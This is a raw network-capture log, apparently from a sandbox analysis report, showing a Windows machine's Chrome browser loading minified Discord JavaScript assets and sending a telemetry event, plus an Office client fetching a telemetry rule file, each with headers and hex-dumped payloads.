                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6e 28 34 39 36 39 33 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 28 74 29 2c 6f 3d 6e 65 77 20 72 28 6e 29 2c 69 3d 30 3b 69 3c 6e 3b 69 2b 2b 29 6f 5b 69 5d 3d 74 5b 6e 2d 69 2d 31 5d 3b 72 65 74 75 72 6e 20 6f 7d 7d 2c 37 31 37 34 34 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 34 39 36 39 33 29 2c 6f 3d 6e 28 39 35 39 33 31 38 29 2c 69 3d 52 61 6e 67 65 45 72 72 6f 72 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 2c 75 29 7b 76 61 72 20 66 3d 65 28 74 29 2c 61 3d 6f 28 6e 29 2c 63 3d 61 3c 30 3f 66 2b 61 3a 61 3b 69 66 28 63 3e 3d 66 7c 7c 63 3c 30 29 74 68 72 6f 77 20 69 28 22 49 6e 63 6f 72 72 65 63 74 20 69 6e 64 65 78 22
                                                                                                                                                                                                                                                                                    Data Ascii: n(49693);t.exports=function(t,r){for(var n=e(t),o=new r(n),i=0;i<n;i++)o[i]=t[n-i-1];return o}},717441:function(t,r,n){var e=n(49693),o=n(959318),i=RangeError;t.exports=function(t,r,n,u){var f=e(t),a=o(n),c=a<0?f+a:a;if(c>=f||c<0)throw i("Incorrect index"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 29 74 68 72 6f 77 20 72 28 22 4d 61 78 69 6d 75 6d 20 61 6c 6c 6f 77 65 64 20 69 6e 64 65 78 20 65 78 63 65 65 64 65 64 22 29 3b 72 65 74 75 72 6e 20 74 7d 7d 2c 36 37 39 36 32 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 36 32 36 35 34 34 29 2e 6d 61 74 63 68 28 2f 66 69 72 65 66 6f 78 5c 2f 28 5c 64 2b 29 2f 69 29 3b 74 2e 65 78 70 6f 72 74 73 3d 21 21 65 26 26 2b 65 5b 31 5d 7d 2c 33 31 30 37 33 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 36 32 36 35 34 34 29 3b 74 2e 65 78 70 6f 72 74 73 3d 2f 4d 53 49 45 7c 54 72 69 64 65 6e 74 2f 2e 74 65 73 74 28 65 29 7d 2c 33 36 31 32 37 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 3d 6e 28 36 32 36 35 34 34 29 2e 6d 61 74
                                                                                                                                                                                                                                                                                    Data Ascii: )throw r("Maximum allowed index exceeded");return t}},679622:function(t,r,n){var e=n(626544).match(/firefox\/(\d+)/i);t.exports=!!e&&+e[1]},310731:function(t,r,n){var e=n(626544);t.exports=/MSIE|Trident/.test(e)},361270:function(t,r,n){var e=n(626544).mat
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 3d 3d 3d 6e 26 26 72 25 32 21 3d 30 3f 72 2b 65 28 74 29 3a 72 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 7b 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6e 29 7b 76 61 72 20 65 2c 6f 2c 70 2c 68 3d 69 28 6e 29 2c 76 3d 38 2a 6e 2d 72 2d 31 2c 64 3d 28 31 3c 3c 76 29 2d 31 2c 67 3d 64 3e 3e 31 2c 6c 3d 32 33 3d 3d 3d 72 3f 66 28 32 2c 2d 32 34 29 2d 66 28 32 2c 2d 37 37 29 3a 30 2c 41 3d 74 3c 30 7c 7c 30 3d 3d 3d 74 26 26 31 2f 74 3c 30 3f 31 3a 30 2c 77 3d 30 3b 66 6f 72 28 28 74 3d 75 28 74 29 29 21 3d 74 7c 7c 74 3d 3d 3d 31 2f 30 3f 28 6f 3d 74 21 3d 74 3f 31 3a 30 2c 65 3d 64 29 3a 28 70 3d 66 28 32 2c 2d 28 65 3d 61 28 63 28 74 29 2f 73 29 29 29 2c 74 2a 70 3c 31 26 26 28 65 2d 2d 2c 70 2a 3d 32 29 2c 65 2b 67 3e 3d 31 3f 74 2b 3d 6c 2f 70 3a 74
                                                                                                                                                                                                                                                                                    Data Ascii: ===n&&r%2!=0?r+e(t):r};t.exports={pack:function(t,r,n){var e,o,p,h=i(n),v=8*n-r-1,d=(1<<v)-1,g=d>>1,l=23===r?f(2,-24)-f(2,-77):0,A=t<0||0===t&&1/t<0?1:0,w=0;for((t=u(t))!=t||t===1/0?(o=t!=t?1:0,e=d):(p=f(2,-(e=a(c(t)/s))),t*p<1&&(e--,p*=2),e+g>=1?t+=l/p:t


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    59192.168.2.549782162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:41 UTC673OUTGET /assets/ac625b77a0bab0ee72df.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC968INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 3530
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ca4fed0cc2-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "be6064ff8c1d480afb80fe48762a06c1"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 28 Jun 2024 00:43:11 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oihsz2Mqb6hprBoCI7gAVIaUFY7EUQnYlGo%2BxW4yurc6vp7ZBlApeL8cL%2FhT6UNZ4lIxY6duAirgnReqxu2XZjNPvQYZb6jy3R8Z5qXVv5uftdGkYYp%2B8zGSKEBe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC401INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 7b 35 30 34 30 35 33 3a 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 65 2e 64 28 74 2c 7b 46 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 65 28 35 31 38 32 36 33 29 2c 65 28 39 37 30 31 37 33 29 2c 65 28 35 32 30 37 31 32 29 2c 65 28 32 36 38 31 31 31 29 2c 65 28 39 34 31 34 39 37 29 2c 65 28 33 32 30 32 36 29 2c 65 28 34 38 30 38 33 39 29 2c 65 28 37 34 34 32 38 35 29 2c 65 28 34 39 32 32 35 37 29 2c 65 28 38 37 33 38 31 37 29 2c 65 28 38 36 33 39 34 32 29 2c 65 28 36 34 32 35 34 39 29 2c 65 28 36 35 33 30 34 31 29 3b 76 61 72 20 6e 3d 65 28 37 38 38 39 30 30 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 72 29 7b 6c 65 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{"use strict";var r={504053:function(r,t,e){e.d(t,{F:function(){return o}}),e(518263),e(970173),e(520712),e(268111),e(941497),e(32026),e(480839),e(744285),e(492257),e(873817),e(863942),e(642549),e(653041);var n=e(788900);function o(r){let t=function(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 2c 6c 3d 72 5b 33 5d 7c 72 5b 34 5d 3c 3c 38 2c 73 3d 28 36 33 26 63 29 2f 36 33 2c 70 3d 28 63 3e 3e 36 26 36 33 29 2f 33 31 2e 35 2d 31 2c 64 3d 28 63 3e 3e 31 32 26 36 33 29 2f 33 31 2e 35 2d 31 2c 76 3d 63 3e 3e 32 33 2c 68 3d 6c 3e 3e 31 35 2c 62 3d 69 28 33 2c 68 3f 76 3f 35 3a 37 3a 37 26 6c 29 2c 67 3d 69 28 33 2c 68 3f 37 26 6c 3a 76 3f 35 3a 37 29 2c 79 3d 76 3f 28 31 35 26 72 5b 35 5d 29 2f 31 35 3a 31 2c 4f 3d 28 72 5b 35 5d 3e 3e 34 29 2f 31 35 2c 6d 3d 76 3f 36 3a 35 2c 77 3d 30 2c 78 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 6c 65 74 20 6f 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 66 6f 72 28 6c 65 74 20 69 3d 66 3f 30 3a 31 3b 69 2a 65 3c 74 2a 28 65 2d 66 29 3b 69 2b 2b 29 6f 2e 70 75 73 68 28 28 28 72 5b 6d 2b 28 77
                                                                                                                                                                                                                                                                                    Data Ascii: ,l=r[3]|r[4]<<8,s=(63&c)/63,p=(c>>6&63)/31.5-1,d=(c>>12&63)/31.5-1,v=c>>23,h=l>>15,b=i(3,h?v?5:7:7&l),g=i(3,h?7&l:v?5:7),y=v?(15&r[5])/15:1,O=(r[5]>>4)/15,m=v?6:5,w=0,x=(t,e,n)=>{let o=[];for(let f=0;f<e;f++)for(let i=f?0:1;i*e<t*(e-f);i++)o.push(((r[m+(w
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC1369INData Raw: 6f 3d 74 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 29 72 65 74 75 72 6e 20 6f 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 66 3d 74 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 72 5b 6e 5d 2e 63 61 6c 6c 28 66 2e 65 78 70 6f 72 74 73 2c 66 2c 66 2e 65 78 70 6f 72 74 73 2c 65 29 2c 66 2e 65 78 70 6f 72 74 73 7d 65 2e 6d 3d 72 2c 65 2e 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 65 2e 4f 28 76 6f 69 64 20 30 2c 5b 22 37 38 31 38 37 22 2c 22 37 31 39 38 34 22 2c 22 34 33 32 32 32 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 22 31 37 31 37 31 36 22 29 7d 29 3b 72 65 74 75 72 6e 20 72 3d 65 2e 4f 28 72 29 7d 2c 65 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 74 3d 72 26 26 72 2e 5f
                                                                                                                                                                                                                                                                                    Data Ascii: o=t[n];if(void 0!==o)return o.exports;var f=t[n]={exports:{}};return r[n].call(f.exports,f,f.exports,e),f.exports}e.m=r,e.x=function(){var r=e.O(void 0,["78187","71984","43222"],function(){return e("171716")});return r=e.O(r)},e.n=function(r){var t=r&&r._
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC391INData Raw: 2c 22 37 31 39 38 34 22 2c 22 34 33 32 32 32 22 5d 2e 6d 61 70 28 65 2e 65 2c 65 29 29 2e 74 68 65 6e 28 72 29 7d 7d 29 28 29 2c 28 28 29 3d 3e 7b 76 61 72 20 72 3d 7b 37 37 34 35 39 3a 31 7d 3b 65 2e 66 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 21 72 5b 74 5d 26 26 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 65 2e 70 2b 65 2e 75 28 74 29 29 7d 3b 76 61 72 20 74 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 2c 6e 3d 74 2e 70 75 73 68 2e 62 69 6e 64 28 74 29 3b 74 2e 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6f 3d 74 5b 30 5d 2c 66 3d 74 5b 31 5d 2c 69 3d 74 5b 32 5d 3b 66 6f 72 28 76 61 72
                                                                                                                                                                                                                                                                                    Data Ascii: ,"71984","43222"].map(e.e,e)).then(r)}})(),(()=>{var r={77459:1};e.f.i=function(t,n){!r[t]&&importScripts(e.p+e.u(t))};var t=this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[],n=t.push.bind(t);t.push=function(t){var o=t[0],f=t[1],i=t[2];for(var


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    60192.168.2.549781162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:41 UTC1680OUTPOST /api/v9/science HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 1126
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjM0NzY5MSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                                                                                                                                                                                                                                    X-Fingerprint: 1309974925423153294.42Ce08a9wThnlRToTnNlmvvLUxI
                                                                                                                                                                                                                                                                                    X-Debug-Options: bugReporterEnabled
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    X-Discord-Timezone: America/New_York
                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                    X-Discord-Locale: en-US
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:41 UTC1126OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 73 65 72 5f 66 69 6e 67 65 72 70 72 69 6e 74 5f 63 68 61 6e 67 65 64 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 32 33 39 32 37 36 30 33 31 32 2c 22 6f 6c 64 5f 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 6e 75 6c 6c 2c 22 6e 65 77 5f 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 33 30 39 39 37 34 39 32 35 34 32 33 31 35 33 32 39 34 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 65 6d 6f 72 79 22 3a 30 2c 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 66 65 61 74 75 72 65 73 22 3a 31 32 38 2c 22 72 65 6e 64 65 72 65 64 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 75 70 74 69 6d 65 5f
                                                                                                                                                                                                                                                                                    Data Ascii: {"events":[{"type":"user_fingerprint_changed","properties":{"client_track_timestamp":1732392760312,"old_fingerprint":null,"new_fingerprint":"1309974925423153294","client_performance_memory":0,"accessibility_features":128,"rendered_locale":"en-US","uptime_
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC823INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:41 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    access-control-allow-origin: https://discord.com
                                                                                                                                                                                                                                                                                    vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers
                                                                                                                                                                                                                                                                                    via: 1.1 google
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTRLWkPr7QJ0GYPu9ATT%2B%2BhCEg6gqURIrNfwiC1k%2F3HAQwPWAA5nQu6MFdLhEjaijaDrhiMZnfhZv75AisiaHLA6E09uCg6BdY3dZ1G8hTAmdQhIW80VAJALQKE5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8e73d0c989144210-EWR


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    61192.168.2.54977913.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 478
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 4b4d3db7-601e-003d-0147-3c6f25000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201242Z-178bfbc474bmqmgjhC1NYCy16c00000004zg00000000e3q3
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    62192.168.2.549783162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC673OUTGET /assets/0a52c6142094387fceed.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC958INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:42 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 516
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0ccfac843bf-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "3803b930385aa579ddf315b689db895a"
                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 13 Nov 2024 23:09:25 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f6My8hNJ9G60QXkAK%2BjGZlklvcZMS9afMvC3PNNe8BqDzXkIWsYfV7RRLPfR3fUef3BMRtyhkwfoQ7pFzaL%2Brex5Wfquvf4kY7e3jCOdO8q21F75DeBow4x44OCI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:42 UTC411INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 38 35 37 37 22 5d 2c 7b 37 37 32 34 31 36 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 61 2c 6f 29 7b 6f 2e 72 28 61 29 2c 61 2e 64 65 66 61 75 6c 74 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 27 7b 22 6f 66 61 7a 53 55 22 3a 22 45 6e 74 65 6e 64 69 64 6f 22 2c 22 4b 55 46 73 4c 69 22 3a 22 5c 78 61 31 45 6c 20 63 61 6d 62 69 6f 20 66 75 65 20 68 65 63 68 6f 21 22 2c 22 79 51 66 4c 77 4d 22 3a 22 44 69 73 63 6f 72 64 20 65 73 74 5c 78 65 31 20 63 6f 6e 66 69 67 75 72 61 64 6f 20 65 6e 20 45 73 70 61 5c 78 66 31 6f 6c
